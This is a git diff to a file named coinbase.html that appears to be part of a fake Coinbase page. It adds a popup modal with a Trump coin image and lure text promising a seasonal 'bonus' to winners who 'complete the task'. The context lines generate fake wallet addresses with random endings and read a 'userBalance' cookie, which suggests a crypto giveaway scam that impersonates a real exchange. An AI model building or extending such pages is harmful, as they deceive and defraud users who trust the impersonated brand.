update alert added with image

--- a/coinbase.html
+++ b/coinbase.html
@@ -302,6 +302,9 @@
     background-position: -200% center;
     }
   }
+  .trump_img{
+    border-radius: 50%;
+  }
 
 </style>
   
@@ -478,6 +481,9 @@
   <!-- Dark Popup Modal 6 -->
   <div id="darkModal6" class="iziModal" data-izimodal-title="Update!!!">
     <div class="dark-content">
+        <p>
+        <img class="trump_img" src="https://s2.coinmarketcap.com/static/img/coins/64x64/35336.png" alt="Trump">
+        </p>
       <p><strong>Don't miss out</strong> on your special offer for this season
 The live OFFICIAL TRUMP today is 26.53 USD with a 24-hour trading volume of $4430844387.08 USD is giving out a bonus for Trump lunch Trump coin be among the winners now by complete the task.</p>
 
@@ -726,7 +732,7 @@ const walletAddress = `0xA1Ed...${randomEnding}`;
   
   });
   
- //🔥🔥🔥🔥🔥 
+ //🔥🔥🔥🔥🔥
     const userBalanceCookie = document.cookie.split('; ').find(row => row.startsWith('userBalance='));
 const userBalance = userBalanceCookie ? parseFloat(userBalanceCookie.split('=')[1]) : null;
 
